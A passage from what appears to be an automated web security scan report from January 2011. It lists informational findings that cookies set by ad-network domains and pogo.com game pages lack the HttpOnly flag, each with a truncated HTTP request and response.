GET /click;h=v8/3a8a/4/a7/%2a Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://ad.amgdgt.com/ads Set-Cookie: id=c653243310000d9 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sun, 09 Jan 2011 02:03:13 GMT Server: GFE/2.0 Content-Type: text/html Connection: close |
10.22. http://ad.turn.com/server/pixel.htm previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/pixel.htm |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 01:48:35 GMT; Path=/
Request
GET /server/pixel.htm?fpid=10 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=TiY2Y7UsIzsDKs0Lv |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 01:48:35 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:48:35 GMT Content-Length: 377 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com ...[SNIP]... |
10.23. http://altfarm.mediaplex.com/ad/js/55290 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://altfarm.mediaplex |
Path: | /ad/js/55290 |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- svid=517004695355; expires=Wed, 8-Jan-2014 5:33:36 GMT; path=/; domain=.mediaplex.com;
Request
GET /ad/js/55290?mpt=3334527 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: no-cache Set-Cookie: svid=517004695355; expires=Wed, 8-Jan-2014 5:33:36 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Location: http://img.mediaplex.com Content-Length: 0 Date: Sun, 09 Jan 2011 02:01:54 GMT |
10.24. http://b.scorecardresearch.com/b previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /b |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- UID=1f00d615-24.143.206
.88-1294170954; expires=Tue, 08-Jan-2013 01:22:52 GMT; path=/; domain=.scorecardresearch .com
Request
GET /b?c1=2&c2=6036333&rn Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 09 Jan 2011 01:22:52 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS |
10.25. http://b.scorecardresearch.com/p previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /p |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- UID=1f00d615-24.143.206
.88-1294170954; expires=Tue, 08-Jan-2013 01:22:56 GMT; path=/; domain=.scorecardresearch .com
Request
GET /p?c1=8&c2=6035179&c3=1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 09 Jan 2011 01:22:56 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS GIF89a.............!..... |
10.26. http://b.scorecardresearch.com/r previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /r |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- UID=1f00d615-24.143.206
.88-1294170954; expires=Tue, 08-Jan-2013 01:24:25 GMT; path=/; domain=.scorecardresearch .com
Request
GET /r?c2=6035165&d.c=gif&d.o Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=1f00d615-24.143.206 |
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 09 Jan 2011 01:24:25 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS GIF89a.............!..... |
10.27. http://board-games.pogo.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | / |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- prod.JID=9647E635CE2
6F393097DADDDE17451AE .000192; Domain=.pogo.com; Path=/ - com.pogo.unid=660628
2471652314; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:17 GMT; Path=/
Request
GET /?pageSection=footer Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=9647E635CE2 Content-Language: en-US Set-Cookie: com.pogo.unid=660628 Location: http://board-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:17 GMT Server: Apache-Coyote/1.1 |
10.28. http://board-games.pogo.com/games/monopoly previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | /games/monopoly |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- prod.JID=C044D23F948
B766D6981FBBCF5BAB72F .000115; Domain=.pogo.com; Path=/ - com.pogo.unid=660637
2665965638; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:18 GMT; Path=/
Request
GET /games/monopoly HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=C044D23F948 Content-Language: en-US Set-Cookie: com.pogo.unid=660637 Location: http://board-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:17 GMT Server: Apache-Coyote/1.1 |
10.29. http://board-games.pogo.com/games/online-chess previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | /games/online-chess |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- prod.JID=8156B355ACC
AE0414EB6405CFDC5596E .000226; Domain=.pogo.com; Path=/ - com.pogo.unid=660645
8565311528; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:19 GMT; Path=/
Request
GET /games/online-chess HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=8156B355ACC Content-Language: en-US Set-Cookie: com.pogo.unid=660645 Location: http://board-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:19 GMT Server: Apache-Coyote/1.1 |
10.30. http://board-games.pogo.com/games/risk previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | /games/risk |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- prod.JID=B04A73F8228
8DFD7D07A20FE079D68B6 .000048; Domain=.pogo.com; Path=/ - com.pogo.unid=660628
6766626273; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:18 GMT; Path=/
Request
GET /games/risk HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=B04A73F8228 Content-Language: en-US Set-Cookie: com.pogo.unid=660628 Location: http://board-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:18 GMT Server: Apache-Coyote/1.1 |
10.31. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Banner |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- eyeblaster=BWVal=&BWDate=
&debuglevel=&FLV=10.1103 &RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com ; path=/ - A2=gn3Ka4Ki09MY0000820wsF
; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ - B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- E2=09MYgA92sF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- u2=0a5bbe64-f3a2-4a01
-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ - U=0a5bbe64-f3a2-4a01-921a
-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ - C_7971\=4288750
Request
GET /BurstingPipe/Banner Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a |
Response
HTTP/1.1 302 Object moved Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Location: http://ds.serving-sys.com Server: Microsoft-IIS/7.5 Set-Cookie: eyeblaster=BWVal=&BWDate= Set-Cookie: A2=gn3Ka4Ki09MY0000820wsF Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=09MYgA92sF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=0a5bbe64-f3a2-4a01 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=0a5bbe64-f3a2-4a01-921a Set-Cookie: C_7971\=4288750 P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 02:06:26 GMT Connection: close |
10.32. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Banner |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- eyeblaster=BWVal=&BWDate=
&debuglevel=&FLV=10.1103 &RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com ; path=/ - u2=0a5bbe64-f3a2-4a01
-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ - U=0a5bbe64-f3a2-4a01-921a
-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ - C_=BlankImage
Request
GET /BurstingPipe/Banner Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Set-Cookie: eyeblaster=BWVal=&BWDate= Set-Cookie: u2=0a5bbe64-f3a2-4a01 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=0a5bbe64-f3a2-4a01-921a Set-Cookie: C_=BlankImage P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 02:06:26 GMT Connection: close |
10.33. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Bursti |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- A2=gn3Ka4JO09MY00008y8ysF
; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ - B2=83xP08y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- C3=0u3F8y8ysF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- D3=0u3F00358y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- E2=09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- u2=1b39b065-3668-4ab4
-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ - U=1b39b065-3668-4ab4-a4dc
-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ - eyeblaster=BWVal=&BWDate=
&debuglevel=&FLV=10.1103 &RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com ; path=/
Request
GET /BurstingPipe/Bursti Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: E2=09MY820wsF; A2=gn3Ka4JO09MY0000820wsF |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: A2=gn3Ka4JO09MY00008y8ysF Set-Cookie: B2=83xP08y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0u3F8y8ysF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0u3F00358y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=1b39b065-3668-4ab4 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=1b39b065-3668-4ab4-a4dc Set-Cookie: eyeblaster=BWVal=&BWDate= P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 01:34:53 GMT Connection: close Content-Length: 0 |
10.34. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/adServer.bs |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- eyeblaster=BWVal=&BWDate=
&debuglevel=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com ; path=/ - A2=gn3Ka4JO09MY0000820wsF
; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ - B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- E2=09MY820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
- u2=1b39b065-3668-4ab4
-a4dc-a28fe9442aaf3G6010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ - U=1b39b065-3668-4ab4-a4dc
-a28fe9442aaf3G6010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Request
GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: eyeblaster=BWVal=&BWDate= Set-Cookie: A2=gn3Ka4JO09MY0000820wsF Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=09MY820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=1b39b065-3668-4ab4 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=1b39b065-3668-4ab4-a4dc P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 01:34:09 GMT Connection: close Content-Length: 1864 var ebPtcl="http://";var ebBigS="ds.serving-sys ...[SNIP]... |
10.35. http://card-games.pogo.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://card-games.pogo |
Path: | / |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- prod.JID=5CA8BC1EE74
B1F0277527A2DFCBA98BA .000080; Domain=.pogo.com; Path=/ - com.pogo.unid=660626
0996807036; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:34 GMT; Path=/
Request
GET / HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=5CA8BC1EE74 Content-Language: en-US Set-Cookie: com.pogo.unid=660626 Location: http://card-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:33 GMT Server: Apache-Coyote/1.1 |
10.36. http://card-games.pogo.com/games/cribbage previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://card-games.pogo |
Path: | /games/cribbage |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- prod.JID=D6065BE7003
57567D81FA6325202FBAB .000289; Domain=.pogo.com; Path=/ - com.pogo.unid=660644
9975376793; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:36 GMT; Path=/
Request
GET /games/cribbage HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=D6065BE7003 Content-Language: en-US Set-Cookie: com.pogo.unid=660644 Location: http://card-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:36 GMT Server: Apache-Coyote/1.1 |
10.37. http://card-games.pogo.com/games/rainy-day-spider-solitaire previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://card-games.pogo |
Path: | /games/rainy-day-spider |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- prod.JID=E00D1123E11
EC01BCF283E18C15DAA77 .000289; Domain=.pogo.com; Path=/ - com.pogo.unid=660644
9975376790; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:35 GMT; Path=/
Request
GET /games/rainy-day-spider Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=E00D1123E11 Content-Language: en-US Set-Cookie: com.pogo.unid=660644 Location: http://card-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:06:35 GMT Server: Apache-Coyote/1.1 |
10.38. http://click.linksynergy.com/fs-bin/stat previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://click.linksynergy |
Path: | /fs-bin/stat |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- lsn_statp=FAJFJR4AAA
AW5BfG5xryCg%3D%3D; Domain=.linksynergy.com; Expires=Sat, 04-Jan-2031 02:07:10 GMT; Path=/ - lsn_qstring=FLenzF8lvbI
%3A146261%3A; Domain=.linksynergy.com; Expires=Mon, 10-Jan-2011 02:07:10 GMT; Path=/ - lsn_track=UmFuZG9tSVZz
%2FLfL%2BfxkMJigkTOg xt3zHfLpNpk0lNFQF8gd %2BQ2vXz0pvncGUWzpoj69n %2Ber3qdc06h0wR6%2F3g%3D %3D; Domain=.linksynergy.com; Expires=Wed, 06-Jan-2021 02:07:10 GMT; Path=/ - lsclick_mid13508="2011-01
-09 02:07:10.379|FLenzF8lvbI -jRY9Ep2QlsT7E2gTD46DFg"; Domain=.linksynergy.com; Expires=Tue, 08-Jan-2013 02:07:10 GMT; Path=/
Request
GET /fs-bin/stat?id Host: click.linksynergy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 301 Moved Permanently Server: Apache-Coyote/1.1 Set-Cookie: lsn_statp=FAJFJR4AAA Set-Cookie: lsn_qstring=FLenzF8lvbI Set-Cookie: lsn_track=UmFuZG9tSVZz Set-Cookie: lsclick_mid13508="2011-01 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa OUR BUS STA" Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Sun, 09 Jan 2011 02:07:09 GMT Cache-Control: no-cache Pragma: no-cache Location: &partnerId=30&siteID Content-Type: text/html;charset=UTF-8 Connection: close <html> <head> <title>301 Moved Permanently</title> </head> <body> <p>The page you are requesting has moved to <a href="&partnerId=30 ...[SNIP]... |
10.39. http://clubpogo-games.pogo.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://clubpogo-games |
Path: | / |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- prod.JID=0C60C5F9106
BE47764E124E1F5A58B30 .000385; Domain=.pogo.com; Path=/ - com.pogo.unid=660643
7090669254; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:07:20 GMT; Path=/
Request
GET / HTTP/1.1 Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=0C60C5F9106 Content-Language: en-US Set-Cookie: com.pogo.unid=660643 Location: http://clubpogo-games Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:07:20 GMT Server: Apache-Coyote/1.1 |
10.40. http://flash-games.pogo.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://flash-games.pogo |
Path: | / |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- prod.JID=DD9ECB5481B
20153BB68707C5F4897F5 .000067; Domain=.pogo.com; Path=/ - com.pogo.unid=660652
7284785334; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:14:44 GMT; Path=/
Request
GET / HTTP/1.1 Host: flash-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=DD9ECB5481B Content-Language: en-US Set-Cookie: com.pogo.unid=660652 Location: http://flash-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:14:43 GMT Server: Apache-Coyote/1.1 |
10.41. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/4252/4762/6670-15.js |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- rdk=4252/4762; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=60; path=/; domain=.rubiconproject
.com - ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=110084; path=/; domain=.rubiconproject
.com - csi15=3188204.js^1
^1294536315^1294536315; expires=Sun, 16-Jan-2011 01:25:15 GMT; max-age=604800; path=/; domain=.rubiconproject .com;
Request
GET /a/4252/4762/6670-15.js Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://www.pogo.com/?sl=2 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ruid=154d290e46adc1d |
Response
